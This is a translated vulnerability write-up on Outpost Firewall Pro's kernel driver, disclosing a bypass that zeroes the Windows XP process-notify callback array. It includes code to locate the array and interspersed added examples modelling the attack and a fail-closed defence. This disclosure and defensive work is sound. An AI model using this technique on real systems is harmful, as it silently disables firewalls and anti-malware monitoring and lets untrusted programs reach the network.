Some technical analysis of Outpost Firewall

Source: Internet. Editor: 程序博客网. Date: 2024/06/03 17:56

OmegacmLabs: “Firewalls. Outpost Firewall Pro”


Basic aims of this document.


 


Protection features


        Outpost Firewall Pro protects the computer against risks in a number of ways. The bulk of the security work is done by filtnt.sys, a kernel-mode driver. This module is the heart of the firewall; it also implements the plug-in system through which functionality is extended without substantial changes to the core.

The plug-in files have the extension ".ofp", probably from "Outpost Firewall Plug-in". I found the following plug-ins installed on my computer:




"Attach Quarantine" - filters mail attachments and automatically renames potentially dangerous files;
"Active Content" - blocks and controls interactive web page content (ActiveX, scripts, Flash, etc.);
"Attack Detection" - detects and repels various external and internal attacks;
"DNS Cache" - remembers the most frequently used DNS addresses to speed up access to web pages;
"Content" - blocks web pages with undesirable or obscene content;
"Anti-Spyware" - finds and removes spyware threats, protecting your personal data from theft by spyware and Trojans, and prevents other undesirable and unauthorized actions;
"Ads" - blocks banners and advertisements contained in web pages.

To support these plug-ins, filtnt.sys works closely with the parts of the plug-ins that run in kernel mode:




adblock.dll
arp.dll
content.dll
dnscache.dll
ftpfilt.dll
htmlfilt.dll
httpfilt.dll
imapfilt.dll
mailfilt.dll
nntpfilt.dll
pop3filt.dll
protect.dll
secret.dll
sockfilt.dll


        Besides this, the firewall has one important peculiarity. As is well known, the body of an HTTP message can be compressed to reduce its size, most often with gzip. Whether compression is used depends on the server: the client (usually a browser) announces which encodings it accepts with the request header "Accept-Encoding: gzip, deflate", and if the server supports one of them it compresses the body and marks the response with "Content-Encoding: gzip" (or deflate). The receiving side decompresses the data when it sees that response header.

        The dynamic library urlmon contains a set of functions for handling gzip, for example _ReadGzipHeader, but they are not exported.

        Outpost Firewall Pro, however, breaks this normal course of events and forces the server to send the data uncompressed, which can multiply the traffic volume several times. (Presumably it does this by removing the Accept-Encoding header from outgoing requests; a client-side filter has no other way to stop a capable server from compressing.) This behaviour can be changed by setting the registry value EnableGzipEncoding = 1 under HKEY_LOCAL_MACHINE\SOFTWARE\Agnitum\Outpost Firewall. Note, however, that the firewall can only "cut" undesirable data out of HTTP messages it receives in plain form, so with compression enabled that filtering no longer applies to compressed responses.
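As an added illustration (this is not Outpost's code and is not taken from the article), here are the two header operations a content-filtering firewall needs on HTTP traffic if it does not decompress bodies itself: removing Accept-Encoding from an outgoing request, which is presumably how Outpost forces plain responses, and recognizing a response whose body arrives compressed and therefore cannot be inspected as text. The request and response are constructed samples; the function names are this example's own.

```c
/* Added example, not Outpost's code: the two HTTP header operations a
 * content-filtering firewall needs if it does not decompress bodies
 * itself. Sample messages are constructed for this example. */
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Case-insensitive test that `s` begins with `prefix`. */
static int starts_ci(const char *s, const char *prefix)
{
    size_t i;
    for (i = 0; prefix[i]; i++)
        if (tolower((unsigned char)s[i]) != tolower((unsigned char)prefix[i]))
            return 0;
    return 1;
}

/* Does this line carry header `name` ("Name:" at line start)? */
static int header_is(const char *line, const char *name)
{
    return starts_ci(line, name) && line[strlen(name)] == ':';
}

/* Copy the HTTP message `in` to `out` (capacity outcap) while dropping
 * every header line named `drop`. The headers end at the first empty
 * line; the body after it is copied untouched. Returns the number of
 * header lines removed, or -1 if `out` is too small. */
int strip_header(const char *in, const char *drop, char *out, size_t outcap)
{
    const char *p = in;
    size_t used = 0;
    int removed = 0, in_headers = 1;

    while (*p) {
        const char *eol = strstr(p, "\r\n");
        size_t linelen = eol ? (size_t)(eol - p) + 2 : strlen(p);
        int keep = 1;

        if (in_headers) {
            if (eol == p)                       /* empty line ends the headers */
                in_headers = 0;
            else if (header_is(p, drop)) {
                keep = 0;
                removed++;
            }
        }
        if (keep) {
            if (used + linelen >= outcap) return -1;
            memcpy(out + used, p, linelen);
            used += linelen;
        }
        p += linelen;
    }
    out[used] = '\0';
    return removed;
}

/* Value of header `name` in the message head, or NULL if absent. */
static const char *find_header(const char *msg, const char *name)
{
    const char *p = msg;
    while (*p) {
        const char *eol = strstr(p, "\r\n");
        if (eol == p) break;                    /* end of headers */
        if (header_is(p, name)) {
            p += strlen(name) + 1;
            while (*p == ' ' || *p == '\t') p++;
            return p;
        }
        if (!eol) break;
        p = eol + 2;
    }
    return NULL;
}

/* 1 if the response body is gzip- or deflate-encoded, i.e. it is not plain
 * text that a filter such as the "Content" or "Ads" plug-in could cut
 * pieces out of; otherwise 0. */
int response_is_compressed(const char *response)
{
    const char *v = find_header(response, "Content-Encoding");
    return v != NULL && (starts_ci(v, "gzip") || starts_ci(v, "deflate"));
}

/* Constructed samples. */
const char *SAMPLE_REQUEST =
    "GET /index.html HTTP/1.1\r\n"
    "Host: example.test\r\n"
    "Accept-Encoding: gzip, deflate\r\n"
    "User-Agent: constructed-sample/1.0\r\n"
    "\r\n";

const char *SAMPLE_GZIP_RESPONSE =
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html\r\n"
    "Content-Encoding: gzip\r\n"
    "Content-Length: 0\r\n"
    "\r\n";

int main(void)
{
    char buf[512];
    int n = strip_header(SAMPLE_REQUEST, "Accept-Encoding", buf, sizeof buf);
    printf("removed %d header(s); rewritten request:\n%s", n, buf);
    printf("gzip response inspectable as text: %s\n",
           response_is_compressed(SAMPLE_GZIP_RESPONSE) ? "no" : "yes");
    return 0;
}
```

The trade-off the article describes falls out directly: once strip_header() is no longer applied to requests (the EnableGzipEncoding = 1 setting), response_is_compressed() starts returning 1 for most text responses and the byte-level content filters have nothing they can match on.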



Short description of filtering methods used by Outpost Firewall Pro.



        A sufficiently detailed description of filtering methods in the MS Windows OS can be found at http://ntoskrnl.com

        For Outpost Firewall Pro it all looks as follows.

        The driver FILTNT.SYS loads immediately after tcpip.sys. You can see this with the LoadOrder utility from Mark Russinovich, or by writing a kernel-mode driver that registers a callback procedure with the function:






NTSTATUS PsSetLoadImageNotifyRoutine(
        IN PLOAD_IMAGE_NOTIFY_ROUTINE NotifyRoutine
);




The procedure of a callback should have the prototype:



VOID (*PLOAD_IMAGE_NOTIFY_ROUTINE) (
        IN PUNICODE_STRING FullImageName,
        IN HANDLE ProcessId,
        IN PIMAGE_INFO ImageInfo
);


Also, the driver must be loaded as SERVICE_BOOT_START. It intercepts the following functions of the NDIS library by patching its export table:



NdisCloseAdapter
NdisDeregisterProtocol
NdisIMRegisterLayeredMiniport
NdisMRegisterMiniport
NdisOpenAdapter
NdisRegisterProtocol

So the driver combines two interception methods: an NDIS hooking filter driver and an NDIS intermediate driver. More about NDIS can be found in the DDK. It also attaches filters to the following devices:


\Device\RawIp, \Device\Udp, \Device\Tcp, \Device\Ip.


which makes it a so-called TDI filter driver. More about this interface is also in the DDK. There is also a simple open-source firewall of this kind, tdi_fw.

        On MS Windows XP and later, the Agnitum Outpost Pro driver also controls IpFilterDriver, the packet filtering interface built into the OS, which the built-in Windows XP firewall also uses. For more complete information see http://microsoft.com.

        There is a coupling between NDIS packets and TDI IRPs: even if your driver bypasses the TDI filter, the IRPs it sends to the real \Device\Tcp will not slip past into the network, because the NDIS-level filter still sees the resulting packets.
Besides all this, Outpost Firewall Pro intercepts the function





NTSTATUS ZwWriteVirtualMemory (
        IN HANDLE ProcessHandle,
        IN PVOID BaseAddress,
        IN PVOID Buffer,
        IN ULONG BufferLength,
        OUT PULONG ReturnLength OPTIONAL
);



by substituting its own handler in the Service Descriptor Table (SSDT). This is how it guards the address space of trusted processes: a process that is allowed network access must not have foreign code written into it and be made to send on someone else's behalf.

        To learn more about this interception method, study the source code of the RegMon utility, available from http://www.sysinternals.com. But in my opinion this single hook is not enough.

        The firewall from ZoneLabs intercepts many more potentially dangerous functions:



ZwConnectPort
ZwCreateFile
ZwCreateKey
ZwCreateProcess
ZwCreateProcessEx
ZwCreateSection
ZwDeleteFile
ZwDeleteKey
ZwDeleteValueKey
ZwDuplicateObject
ZwLoadDriver
ZwLoadKey
ZwMapViewOfSection
ZwOpenFile
ZwOpenProcess
ZwOpenThread
ZwReplaceKey
ZwRequestWaitReplyPort
ZwRestoreKey
ZwSecureConnectPort
ZwSetInformationFile
ZwSetSystemInformation
ZwSetValueKey
ZwTerminateProcess
ZwUnloadDriver

The driver registers a callback function with

NTSTATUS PsSetCreateProcessNotifyRoutine(
        IN PCREATE_PROCESS_NOTIFY_ROUTINE NotifyRoutine,
        IN BOOLEAN Remove
);

whose prototype must be:

VOID (*PCREATE_PROCESS_NOTIFY_ROUTINE) (
        IN HANDLE ParentId,
        IN HANDLE ProcessId,
        IN BOOLEAN Create
);




        This is how the driver filtnt.sys learns about the creation and termination of processes. If we look closely at the implementation of PsSetCreateProcessNotifyRoutine, we see approximately the following:



/* NotifyRoutine and Remove are the two parameters of
   PsSetCreateProcessNotifyRoutine; PSP_MAX_CREATE_PROCESS_NOTIFY is 8 */
for (i=0; i < PSP_MAX_CREATE_PROCESS_NOTIFY; i++) {
        if (Remove) {
                /* unregister: blank the slot that holds this routine */
                if (PspCreateProcessNotifyRoutine[i] == NotifyRoutine) {
                        PspCreateProcessNotifyRoutine[i] = NULL;
                        PspCreateProcessNotifyRoutineCount -= 1;
                        return STATUS_SUCCESS;
                }
        } else {
                /* register: take the first free slot */
                if (PspCreateProcessNotifyRoutine[i] == NULL) {
                        PspCreateProcessNotifyRoutine[i] = NotifyRoutine;
                        PspCreateProcessNotifyRoutineCount += 1;
                        return STATUS_SUCCESS;
                }
        }
}




        That is, the array PspCreateProcessNotifyRoutine holds the addresses of the registered callback functions, which are called on the creation and termination of processes.

        This implementation is accurate for MS Windows 2000 and earlier; in later versions the implementation is somewhat different, but the essence has not changed.

        What would removing these handlers from the array, i.e. zeroing the elements of PspCreateProcessNotifyRoutine, achieve?

        The obvious answer would seem to be "nothing at all": the firewall driver would simply stop learning about the creation and termination of processes and would keep applying its "list of trusted applications", allowing or denying network access only to the programs it already knows about.

        But the real picture on the battlefield is this: after such manipulation of memory, packets from every application pass into the network. The firewall behaves as if it were inactive for all applications except those already on its list of registered applications; a process it has never heard about is let through rather than blocked.

        So what is this? A tactical mistake or criminal negligence?

        There is no unequivocal answer, but the fact does not speak in Agnitum's favour.
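To make the fail-open behaviour concrete, here is an added user-mode model (not Outpost's code, not Windows' code, and not from the article) of the array semantics quoted above together with a firewall that depends on it and two possible policies. The kernel-side names follow the pseudocode above and its Windows 2000 layout of raw function pointers; the process table, the "even PIDs are trusted" rule standing in for the list of trusted applications, the scenario function and the self-check fw_callback_present() are this example's own assumptions. A real driver would also have to enumerate the processes that existed before it registered; the model leaves that out.

```c
/* Added example, not Outpost's, Windows' or the article's code: a
 * user-mode model of the PspCreateProcessNotifyRoutine array from the
 * pseudocode above, a firewall that depends on it, and the difference
 * between failing open and failing closed once the array is wiped.
 * The process table, the "even PIDs are trusted" stand-in for the list
 * of trusted applications, and the self-check are this example's own. */
#include <stdio.h>
#include <string.h>

#define PSP_MAX_CREATE_PROCESS_NOTIFY 8
#define STATUS_SUCCESS            0
#define STATUS_INVALID_PARAMETER  (-1)

typedef void (*CREATE_PROCESS_NOTIFY_ROUTINE)(unsigned parent, unsigned pid, int create);

static CREATE_PROCESS_NOTIFY_ROUTINE PspCreateProcessNotifyRoutine[PSP_MAX_CREATE_PROCESS_NOTIFY];
static int PspCreateProcessNotifyRoutineCount;

/* Model of the kernel function as quoted above (Windows 2000 layout). */
int PsSetCreateProcessNotifyRoutine(CREATE_PROCESS_NOTIFY_ROUTINE routine, int remove)
{
    for (int i = 0; i < PSP_MAX_CREATE_PROCESS_NOTIFY; i++) {
        if (remove) {
            if (PspCreateProcessNotifyRoutine[i] == routine) {
                PspCreateProcessNotifyRoutine[i] = NULL;
                PspCreateProcessNotifyRoutineCount--;
                return STATUS_SUCCESS;
            }
        } else if (PspCreateProcessNotifyRoutine[i] == NULL) {
            PspCreateProcessNotifyRoutine[i] = routine;
            PspCreateProcessNotifyRoutineCount++;
            return STATUS_SUCCESS;
        }
    }
    return STATUS_INVALID_PARAMETER;      /* not found, or no free slot */
}

/* What the kernel does on process creation/exit: call every live slot. */
static void PspNotifyProcess(unsigned parent, unsigned pid, int create)
{
    for (int i = 0; i < PSP_MAX_CREATE_PROCESS_NOTIFY; i++)
        if (PspCreateProcessNotifyRoutine[i])
            PspCreateProcessNotifyRoutine[i](parent, pid, create);
}

/* ---- the firewall driver's side ---------------------------------- */
#define MAX_PROCS 16
enum { UNKNOWN = 0, TRUSTED = 1, BLOCKED = 2 };
static struct { unsigned pid; int state; } fw_procs[MAX_PROCS];

/* Firewall callback: classify each new process against the trusted list
 * (assumption: even PIDs are "trusted applications"); forget exited ones. */
static void FwProcessNotify(unsigned parent, unsigned pid, int create)
{
    (void)parent;
    for (int i = 0; i < MAX_PROCS; i++) {
        if (create && fw_procs[i].pid == 0) {
            fw_procs[i].pid = pid;
            fw_procs[i].state = (pid % 2 == 0) ? TRUSTED : BLOCKED;
            return;
        }
        if (!create && fw_procs[i].pid == pid) {
            fw_procs[i].pid = 0;
            fw_procs[i].state = UNKNOWN;
            return;
        }
    }
}

static int fw_lookup(unsigned pid)
{
    for (int i = 0; i < MAX_PROCS; i++)
        if (fw_procs[i].pid == pid) return fw_procs[i].state;
    return UNKNOWN;
}

/* Fail-open policy (the behaviour the article describes): a packet from a
 * process the firewall never heard about is let through. */
int fw_allow_fail_open(unsigned pid)   { return fw_lookup(pid) != BLOCKED; }

/* Fail-closed policy: only a process positively known as trusted may send,
 * so losing the callback means "nothing new gets out", not "everything". */
int fw_allow_fail_closed(unsigned pid) { return fw_lookup(pid) == TRUSTED; }

/* Self-check a driver could run if it knows the array's address (by the
 * same heuristic the attacker uses): is my callback still registered? */
int fw_callback_present(void)
{
    for (int i = 0; i < PSP_MAX_CREATE_PROCESS_NOTIFY; i++)
        if (PspCreateProcessNotifyRoutine[i] == FwProcessNotify) return 1;
    return 0;
}

/* The attack from the article: zero every slot with a raw memory write,
 * leaving PspCreateProcessNotifyRoutineCount stale. */
void attacker_zero_notify_array(void)
{
    memset(PspCreateProcessNotifyRoutine, 0, sizeof PspCreateProcessNotifyRoutine);
}

/* Scenario: one process seen before the wipe, one created after it.
 * Returns 1 when the fail-open policy leaks the unknown (untrusted, odd)
 * PID 1001 while the fail-closed policy still blocks it. */
int scenario_fail_open_leak(void)
{
    memset(fw_procs, 0, sizeof fw_procs);
    memset(PspCreateProcessNotifyRoutine, 0, sizeof PspCreateProcessNotifyRoutine);
    PspCreateProcessNotifyRoutineCount = 0;
    PsSetCreateProcessNotifyRoutine(FwProcessNotify, 0);
    PspNotifyProcess(4, 1000, 1);         /* seen while the callback is live */
    attacker_zero_notify_array();
    PspNotifyProcess(4, 1001, 1);         /* the firewall never hears of this one */
    return fw_allow_fail_open(1001) && !fw_allow_fail_closed(1001)
        && fw_allow_fail_closed(1000) && !fw_callback_present();
}

int main(void)
{
    printf("fail-open leak reproduced: %s\n", scenario_fail_open_leak() ? "yes" : "no");
    printf("stale notify count after wipe: %d\n", PspCreateProcessNotifyRoutineCount);
    return 0;
}
```

Two side effects of the raw write are worth noting because a driver can observe them without any unsupported memory reads: the registration count no longer matches the array, and the driver's own unregistration call at unload time fails with STATUS_INVALID_PARAMETER because its routine is no longer found. The fail-closed variant is the design point: a packet that cannot be attributed to a known process should be denied, not allowed.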

Realization.

 

        To demonstrate this, an ordinary (legacy) kernel-mode driver is needed. The hardest part of the driver is finding the address of the array PspCreateProcessNotifyRoutine: this variable is not exported, and its address differs between versions of the MS Windows NT family. I did not want to write the driver for every version of the operating system, so I accepted a limitation: the driver should work reliably on MS Windows XP, today the most popular operating system of the NT family. We also need a length disassembler that works in kernel mode; I chose ldasm because it meets the requirements of the task.

        The array PspCreateProcessNotifyRoutine has at most 8 cells (PSP_MAX_CREATE_PROCESS_NOTIFY), and it may hold callback procedures not only of Outpost Firewall Pro but also of other useful programs: anti-virus and anti-spyware products.

        I remind you that by using the driver offered by the author you agree that the author is not liable for any loss caused by its use. And to answer in advance the question of why the driver has a number of defects and is not finished: its purpose was not to help the authors of malicious programs.

        In the disassembled function, the address of the variable we need is loaded into register EDI. The machine code is BF 00 0E 54 80 57: BF 00 0E 54 80 is "mov edi, 0x80540E00", where 0x80540E00 is the address of the variable copied into EDI, and 0x57 is the opcode of the following "push edi". The heuristic for finding the address of the array PspCreateProcessNotifyRoutine rests on this assumption.

        It is also shown in procedure getPspCreateProcessNotifyRoutine():


PVOID getPspCreateProcessNotifyRoutine( )
{
        PUCHAR _ptr;
        PUCHAR cPtr, pOpcode;
        ULONG Length;

        /* PsSetCreateProcessNotifyRoutine is imported, so its name resolves
           to the import stub "jmp dword ptr [IAT slot]" (FF 25 disp32);
           [stub+2] is the address of the IAT slot, and the slot holds the
           real address of the function inside ntoskrnl. */
        __asm {
                pushad
                mov eax, PsSetCreateProcessNotifyRoutine
                mov eax, [eax+2]
                mov eax, [eax]
                mov _ptr, eax
                popad
        }

        /* Walk the function one instruction at a time (ldasm's SizeOfCode
           returns the length and a pointer to the opcode past any prefixes),
           looking for "mov edi, imm32" (BF imm32) directly followed by
           "push edi" (57). Only the opcode byte is compared; a 16-bit compare
           here would also drag in the low byte of the immediate. */
        for (cPtr = (PUCHAR)_ptr;
                cPtr < (PUCHAR)_ptr + PAGE_SIZE;
                cPtr += Length)
        {
                Length = SizeOfCode(cPtr, &pOpcode);
                if (!Length) break;
                if (*pOpcode == 0xBF && *(pOpcode + 5) == 0x57)
                {
                        /* the imm32 is the address of PspCreateProcessNotifyRoutine */
                        return *(PVOID **)(pOpcode + 1);
                }
        }
        return NULL;
}
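The following is an added user-mode model of that heuristic (it is not the article's driver, which needs ldasm and kernel mode): a small x86-32 instruction-length decoder standing in for ldasm covers the opcodes found in a constructed sample of machine code, and the search is run both instruction by instruction and as a naive byte scan, to show why the length disassembler matters. The sample bytes, including the decoy immediate, are constructed for this example; 0x80540E00 is the address quoted above.

```c
/* Added example, not the article's driver: a user-mode model of the
 * search in getPspCreateProcessNotifyRoutine(). A tiny length decoder for
 * a subset of x86-32 stands in for ldasm; the code buffer is constructed
 * here and 0x80540E00 is the address quoted in the article. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Length of a ModRM-encoded operand (ModRM [+ SIB] [+ disp]), 32-bit mode. */
static size_t modrm_len(const uint8_t *p)
{
    uint8_t mod = p[0] >> 6, rm = p[0] & 7;
    size_t n = 1;
    if (mod != 3 && rm == 4) n++;                  /* SIB byte present */
    if (mod == 1) n += 1;                          /* disp8 */
    else if (mod == 2) n += 4;                     /* disp32 */
    else if (mod == 0 && rm == 5) n += 4;          /* disp32, no base */
    return n;
}

/* Instruction length for a subset of x86-32; 0 = unknown opcode (stop). */
size_t insn_len(const uint8_t *p)
{
    uint8_t op = p[0];
    if (op >= 0x50 && op <= 0x5F) return 1;                 /* push/pop reg */
    if (op >= 0xB8 && op <= 0xBF) return 5;                 /* mov reg, imm32 */
    if (op == 0x90 || op == 0xC3 || op == 0xCC) return 1;   /* nop, ret, int3 */
    if (op == 0xC2) return 3;                               /* ret imm16 */
    if (op == 0xE8 || op == 0xE9) return 5;                 /* call/jmp rel32 */
    if (op == 0xEB || (op >= 0x70 && op <= 0x7F)) return 2; /* short jumps */
    if (op == 0x8B || op == 0x89 || op == 0x33 || op == 0x3B ||
        op == 0x85 || op == 0x8D)
        return 1 + modrm_len(p + 1);                        /* mov/xor/cmp/test/lea */
    if (op == 0x83) return 1 + modrm_len(p + 1) + 1;        /* op r/m, imm8 */
    return 0;
}

/* Correct search: compare only the first byte of each instruction. */
uint32_t find_notify_array(const uint8_t *code, size_t len)
{
    size_t off = 0;
    while (off + 6 <= len) {
        size_t n = insn_len(code + off);
        if (n == 0) break;
        if (code[off] == 0xBF && code[off + 5] == 0x57) {
            uint32_t imm;
            memcpy(&imm, code + off + 1, 4);    /* little-endian imm32 */
            return imm;
        }
        off += n;
    }
    return 0;
}

/* Naive byte scan: what the search degrades to without a length decoder. */
uint32_t find_notify_array_naive(const uint8_t *code, size_t len)
{
    for (size_t off = 0; off + 6 <= len; off++)
        if (code[off] == 0xBF && code[off + 5] == 0x57) {
            uint32_t imm;
            memcpy(&imm, code + off + 1, 4);
            return imm;
        }
    return 0;
}

/* Constructed function body: an XP-style prologue plus a decoy. */
const uint8_t SAMPLE_CODE[] = {
    0x8B, 0xFF,                         /* mov edi, edi   (hotpatch pad) */
    0x55,                               /* push ebp */
    0x8B, 0xEC,                         /* mov ebp, esp */
    0x53,                               /* push ebx */
    0xB8, 0xBF, 0x11, 0x22, 0x33,       /* mov eax, 0x332211BF  (decoy: BF inside imm) */
    0x90,                               /* nop */
    0x57,                               /* push edi  (decoy: lands 5 bytes after that BF) */
    0x33, 0xDB,                         /* xor ebx, ebx */
    0xBF, 0x00, 0x0E, 0x54, 0x80,       /* mov edi, 0x80540E00  <- the real one */
    0x57,                               /* push edi */
    0x8B, 0x45, 0x08,                   /* mov eax, [ebp+8] */
    0xC3,                               /* ret */
};
const size_t SAMPLE_CODE_LEN = sizeof SAMPLE_CODE;

int main(void)
{
    printf("instruction walk : 0x%08X\n", find_notify_array(SAMPLE_CODE, SAMPLE_CODE_LEN));
    printf("naive byte scan  : 0x%08X\n", find_notify_array_naive(SAMPLE_CODE, SAMPLE_CODE_LEN));
    return 0;
}
```

The naive scan returns the decoy value 0x90332211 because it matches a BF that is really the low byte of another instruction's immediate; walking instruction boundaries skips over it and lands on the real "mov edi, imm32". The kernel-mode version has the same shape, with ldasm supplying the lengths and the walk bounded by PAGE_SIZE as in the driver above.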



        In the entry procedure DriverEntry(), the version of the operating system is checked (I remind you that the search method for the variable was tested only on MS Windows XP, so on any other version no action is taken); the cells of the array are then simply zeroed.

        The archive accompanying the article also contains an application that installs and starts the driver (note that administrator rights are required for this); if the manipulation of the kernel variable succeeds, the program downloads a file from our site, i.e. it reaches the network without the firewall's consent.



Conclusions.

 

        In my opinion, solving this problem will be very hard, whatever the company's representatives say: the firewall cannot detect the creation and termination of processes once the array is cleared, and writing a program that uses the described method is not a difficult job. This threatens an enormous hole in the security of a personal computer with Agnitum Outpost Pro installed.

        Despite its fairly advanced network traffic control tools, Outpost Firewall Pro does not meet modern security requirements, even though it is the most popular personal firewall in the former USSR.

        A situation in which the manufacturer is not accountable to its users contradicts the laws of a market economy and common sense (if such a thing exists in nature), and it outrages me.

        We do not call on you to throw 30 pieces of silver at the company's office, but the current order of things deserves some thought.




        This document briefly describes some features of the firewall Agnitum Outpost Pro, gives an initial picture of its merits and shortcomings, and presents some technical details that support the author's point of view.

        The author is surprised by the present situation, in which users choose one piece of software or another on the basis of advertising. The advertised claims frequently do not match reality. This lowers the potential security of computers: unscrupulous software vendors sacrifice the interests of users and receive financial profit in exchange.

                With best regards, © Kumbayo.

                Translated from Russian by uphill.